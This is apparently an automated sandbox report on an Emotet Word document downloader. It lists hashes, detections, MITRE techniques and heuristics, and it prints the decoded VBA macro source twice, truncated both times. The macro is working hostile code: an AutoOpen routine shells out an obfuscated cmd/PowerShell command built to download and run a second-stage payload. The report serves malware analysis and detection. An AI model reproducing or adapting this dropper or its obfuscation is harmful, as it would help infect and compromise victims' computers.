Emotet Office (OLE) malware analysis — malicious · 41381d1be6edc5b4

MALICIOUS

Office (OLE)

93.6 KB Created: 2018-09-21 14:37:00 Authoring application: Microsoft Office Word First seen: 2019-01-11

MD5: 0016632d5787d3aafcd96a3765f2f209 SHA-1: ee427446c4e6b564ed76d9b6d1fd9189b2e9c21a SHA-256: 41381d1be6edc5b46bc2aa5dcf06bbb5b0557ba81d821d23eb69f87660c0dbc1

142 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6826430-0', indicating a downloader for the Emotet family. The presence of a VBA macro with an 'AutoOpen' subroutine, which is a common execution vector, further supports this. The macro uses the Shell function to execute a command, likely downloading and running a secondary payload.

Heuristics 5

ClamAV: Doc.Downloader.Emotet-6826430-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6826430-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12532 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12532 bytes
SHA-256: `bef3386ad096127f711363ce787e007b8eb1617cf39dad6b0693d1bf3f3f6c09`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "iizjCRDRuNsVA" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim MHFnZ(2) MHFnZ(0) = Left("wZfvzKsw", 484) MHFnZ(1) = Mid("Dboiscm", 481, 162) Dim IAHmvO(2) IAHmvO(0) = MidB("cUPIQi", 996, 290) IAHmvO(1) = Right("uufbE", 228) Dim TjjXN(1) TjjXN(0) = MidB("EzNaa", 820, 569) Dim jUaok(1) jUaok(0) = Mid("cjHCivEw", 444, 128) Dim jlwKh(1) jlwKh(0) = Mid("UsvSOL", 697, 399) Dim vwXZi(1) vwXZi(0) = Mid("zTSvv", 551, 813) Dim zciihY(2) zciihY(0) = MidB("frzFRI", 620, 219) zciihY(1) = Left("hPGnLRoz", 516) dMNdIZlc (KeyString(6 + 3 + 9 + 11 + 38) + XzuRhrw + IlCbz + zAnMa + XKWczi + QpOzmQzA + fIMRSkQDkPHW) Dim hXVMz(2) hXVMz(0) = Left("LuktwQMi", 565) hXVMz(1) = Left("MuBQB", 199) Dim OsTjo(2) OsTjo(0) = Left("DbwSPCi", 122) OsTjo(1) = MidB("rjKjAkz", 516, 889) Dim jwqcjQ(1) jwqcjQ(0) = Right("ZhkAfG", 689) End Sub Function dMNdIZlc(pEEQlpihAs As String) Dim Xjcizz(2) Xjcizz(0) = MidB("bjaNomz", 276, 954) Xjcizz(1) = Mid("FCiljzhd", 631, 577) Dim nVlvSw(2) nVlvSw(0) = MidB("Xhljs", 657, 46) nVlvSw(1) = Left("zcjDDi", 211) Shell@ pEEQlpihAs, CInt(msoBarTypeNormal) Dim vUzmKD(2) vUzmKD(0) = MidB("ULShzbW", 179, 318) vUzmKD(1) = Right("uwoDvjE", 726) Dim MiRFOd(1) MiRFOd(0) = MidB("pqqku", 18, 321) Dim HcBJX(1) HcBJX(0) = Right("WXZjJFM", 149) Dim LNTkn(1) LNTkn(0) = Mid("ZfbRfSU", 609, 393) End Function Attribute VB_Name = "wpULVtBFvTmAKp" Function XzuRhrw() Dim vQKEwr(1) vQKEwr(0) = MidB("dDmSkhE", 421, 648) Dim zqSdz(1) zqSdz(0) = Right("pTCJz", 633) Dim waAsXO(2) waAsXO(0) = Mid("tiuzhJ", 918, 331) waAsXO(1) = MidB("CSAaiR", 478, 701) nJKthBOC = "m" + "d /V" + "^:^" + "O/C" + ChrW(5 + 2 + 1 + 1 + 25) + "^s" Dim aTAjiw(2) aTAjiw(0) = Mid("vfsfA", 341, 704) aTAjiw(1) = Left("EwYAkYdR", 323) NahjjA = "^e" + "t" + " L" + "^6c^" + "f" + "= ^ " + "^ ^ " + "^ " Dim lUIXjG(1) lUIXjG(0) = Mid("CIAiF", 936, 39) Dim ORTSBV(1) ORTSBV(0) = MidB("zLdLizJY", 871, 549) Dim ocdWkC(1) ocdWkC(0) = MidB("HkVwO", 542, 830) Dim wtrviW(2) wtrviW(0) = Mid("OjXBKil", 333, 998) wtrviW(1) = Left("XclQZ", 201) YRsBNrjwjw = "^ ^" + " ^" + " " + " ^ " + " ^ " Dim HKZJTc(2) HKZJTc(0) = Right("jJNWzFQW", 679) HKZJTc(1) = Right("pnAWPGm", 468) Dim WEwclc(1) WEwclc(0) = Left("VnnXW", 719) HZhoib = "^ }}" + "{^hc" + "t^ac" + "^" + "}" + "^;k^" Dim sEnlP(1) sEnlP(0) = MidB("wCjZkT", 888, 141) Dim dcnljL(2) dcnljL(0) = MidB("OkCmS", 495, 464) dcnljL(1) = MidB("OPdAFQEs", 638, 967) mjLkUjwL = "ae" + "r" + "b" + "^;^" + "m" + "G" + "J" Dim ofJGw(1) ofJGw(0) = Right("FQiiV", 112) Dim QqLIQ(1) QqLIQ(0) = Mid("wTwinqw", 38, 202) Dim DUawZr(2) DUawZr(0) = MidB("vDHhZk", 128, 760) DUawZr(1) = Left("GQKwRXD", 531) Dim wdRDr(1) wdRDr(0) = Left("wIYUUcJ", 303) OCVRJjqSSVX = "$^ " + "^m^e" + "t^" + "I^" + "-" + "ekov" + "nI;)" + "m^G" + "J" + "^$" + "^ " + "^,q^" + "PD^" Dim OzsJc(2) OzsJc(0) = MidB("nSmszWjU", 410, 760) OzsJc(1) = MidB("FhIJdBL", 322, 273) Dim tYzpGW(1) tYzpGW(0) = MidB("vTijivJh", 299, 297) Dim fbLvLr(2) fbLvLr(0) = MidB("VibTH", 251, 68) fbLvLr(1) = Right("wNWcA", 174) Dim isirv(2) isirv(0) = Left("RvlwhsO", 245) isirv(1) = MidB("ZNuHPMXZ", 393, 43) SIBsWiuAAfL = "$(^e" + "li^F" + "daol" + "n" + "wo^D" + "." + "v" + "^a" + "N$^{" + "yr" Dim HSOpZ(1) HSOpZ(0) = MidB("EuoMlJ", 438, 248) Dim hstbl(2) hstbl(0) = Mid("biLAk", 154, 312) hstbl(1) = Left("QoRhskw", 828) Dim DSpQE(1) DSpQE(0) = Mid("ForhiBfr", 894, 817) Dim Awlvj(2) Awlvj(0) = Mid("zDKjCOob", 224, 952) Awlvj(1) = Right("qVSEkTU", 144) Dim jjWkAh(2) jjWkAh(0) = Left("FQVmcNqY", 913) jjWkAh(1) = Mid("fdZowiMw", 944, 829) zwVAkKz = "^" + "t" + "^{)^" + "T^p" + "M$^" ... (truncated)

SHA-256: bef3386ad096127f711363ce787e007b8eb1617cf39dad6b0693d1bf3f3f6c09

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "iizjCRDRuNsVA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim MHFnZ(2)
MHFnZ(0) = Left("wZfvzKsw", 484)
MHFnZ(1) = Mid("Dboiscm", 481, 162)

   Dim IAHmvO(2)
IAHmvO(0) = MidB("cUPIQi", 996, 290)
IAHmvO(1) = Right("uufbE", 228)

   Dim TjjXN(1)
TjjXN(0) = MidB("EzNaa", 820, 569)

   Dim jUaok(1)
jUaok(0) = Mid("cjHCivEw", 444, 128)

   Dim jlwKh(1)
jlwKh(0) = Mid("UsvSOL", 697, 399)

   Dim vwXZi(1)
vwXZi(0) = Mid("zTSvv", 551, 813)

   Dim zciihY(2)
zciihY(0) = MidB("frzFRI", 620, 219)
zciihY(1) = Left("hPGnLRoz", 516)

dMNdIZlc (KeyString(6 + 3 + 9 + 11 + 38) + XzuRhrw + IlCbz + zAnMa + XKWczi + QpOzmQzA + fIMRSkQDkPHW)
   Dim hXVMz(2)
hXVMz(0) = Left("LuktwQMi", 565)
hXVMz(1) = Left("MuBQB", 199)

   Dim OsTjo(2)
OsTjo(0) = Left("DbwSPCi", 122)
OsTjo(1) = MidB("rjKjAkz", 516, 889)

   Dim jwqcjQ(1)
jwqcjQ(0) = Right("ZhkAfG", 689)

End Sub
Function dMNdIZlc(pEEQlpihAs As String)
   Dim Xjcizz(2)
Xjcizz(0) = MidB("bjaNomz", 276, 954)
Xjcizz(1) = Mid("FCiljzhd", 631, 577)

   Dim nVlvSw(2)
nVlvSw(0) = MidB("Xhljs", 657, 46)
nVlvSw(1) = Left("zcjDDi", 211)

Shell@ pEEQlpihAs, CInt(msoBarTypeNormal)
   Dim vUzmKD(2)
vUzmKD(0) = MidB("ULShzbW", 179, 318)
vUzmKD(1) = Right("uwoDvjE", 726)

   Dim MiRFOd(1)
MiRFOd(0) = MidB("pqqku", 18, 321)

   Dim HcBJX(1)
HcBJX(0) = Right("WXZjJFM", 149)

   Dim LNTkn(1)
LNTkn(0) = Mid("ZfbRfSU", 609, 393)

End Function

Attribute VB_Name = "wpULVtBFvTmAKp"
Function XzuRhrw()
Dim vQKEwr(1)
vQKEwr(0) = MidB("dDmSkhE", 421, 648)

   Dim zqSdz(1)
zqSdz(0) = Right("pTCJz", 633)

   Dim waAsXO(2)
waAsXO(0) = Mid("tiuzhJ", 918, 331)
waAsXO(1) = MidB("CSAaiR", 478, 701)

nJKthBOC = "m" + "d /V" + "^:^" + "O/C" + ChrW(5 + 2 + 1 + 1 + 25) + "^s"
Dim aTAjiw(2)
aTAjiw(0) = Mid("vfsfA", 341, 704)
aTAjiw(1) = Left("EwYAkYdR", 323)

NahjjA = "^e" + "t" + " L" + "^6c^" + "f" + "= ^ " + "^ ^ " + "^ "
Dim lUIXjG(1)
lUIXjG(0) = Mid("CIAiF", 936, 39)

   Dim ORTSBV(1)
ORTSBV(0) = MidB("zLdLizJY", 871, 549)

   Dim ocdWkC(1)
ocdWkC(0) = MidB("HkVwO", 542, 830)

   Dim wtrviW(2)
wtrviW(0) = Mid("OjXBKil", 333, 998)
wtrviW(1) = Left("XclQZ", 201)

YRsBNrjwjw = "^  ^" + " ^" + "   " + " ^ " + " ^  "
Dim HKZJTc(2)
HKZJTc(0) = Right("jJNWzFQW", 679)
HKZJTc(1) = Right("pnAWPGm", 468)

   Dim WEwclc(1)
WEwclc(0) = Left("VnnXW", 719)

HZhoib = "^ }}" + "{^hc" + "t^ac" + "^" + "}" + "^;k^"
Dim sEnlP(1)
sEnlP(0) = MidB("wCjZkT", 888, 141)

   Dim dcnljL(2)
dcnljL(0) = MidB("OkCmS", 495, 464)
dcnljL(1) = MidB("OPdAFQEs", 638, 967)

mjLkUjwL = "ae" + "r" + "b" + "^;^" + "m" + "G" + "J"
Dim ofJGw(1)
ofJGw(0) = Right("FQiiV", 112)

   Dim QqLIQ(1)
QqLIQ(0) = Mid("wTwinqw", 38, 202)

   Dim DUawZr(2)
DUawZr(0) = MidB("vDHhZk", 128, 760)
DUawZr(1) = Left("GQKwRXD", 531)

   Dim wdRDr(1)
wdRDr(0) = Left("wIYUUcJ", 303)

OCVRJjqSSVX = "$^ " + "^m^e" + "t^" + "I^" + "-" + "ekov" + "nI;)" + "m^G" + "J" + "^$" + "^ " + "^,q^" + "PD^"
Dim OzsJc(2)
OzsJc(0) = MidB("nSmszWjU", 410, 760)
OzsJc(1) = MidB("FhIJdBL", 322, 273)

   Dim tYzpGW(1)
tYzpGW(0) = MidB("vTijivJh", 299, 297)

   Dim fbLvLr(2)
fbLvLr(0) = MidB("VibTH", 251, 68)
fbLvLr(1) = Right("wNWcA", 174)

   Dim isirv(2)
isirv(0) = Left("RvlwhsO", 245)
isirv(1) = MidB("ZNuHPMXZ", 393, 43)

SIBsWiuAAfL = "$(^e" + "li^F" + "daol" + "n" + "wo^D" + "." + "v" + "^a" + "N$^{" + "yr"
Dim HSOpZ(1)
HSOpZ(0) = MidB("EuoMlJ", 438, 248)

   Dim hstbl(2)
hstbl(0) = Mid("biLAk", 154, 312)
hstbl(1) = Left("QoRhskw", 828)

   Dim DSpQE(1)
DSpQE(0) = Mid("ForhiBfr", 894, 817)

   Dim Awlvj(2)
Awlvj(0) = Mid("zDKjCOob", 224, 952)
Awlvj(1) = Right("qVSEkTU", 144)

   Dim jjWkAh(2)
jjWkAh(0) = Left("FQVmcNqY", 913)
jjWkAh(1) = Mid("fdZowiMw", 944, 829)

zwVAkKz = "^" + "t" + "^{)^" + "T^p" + "M$^" 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.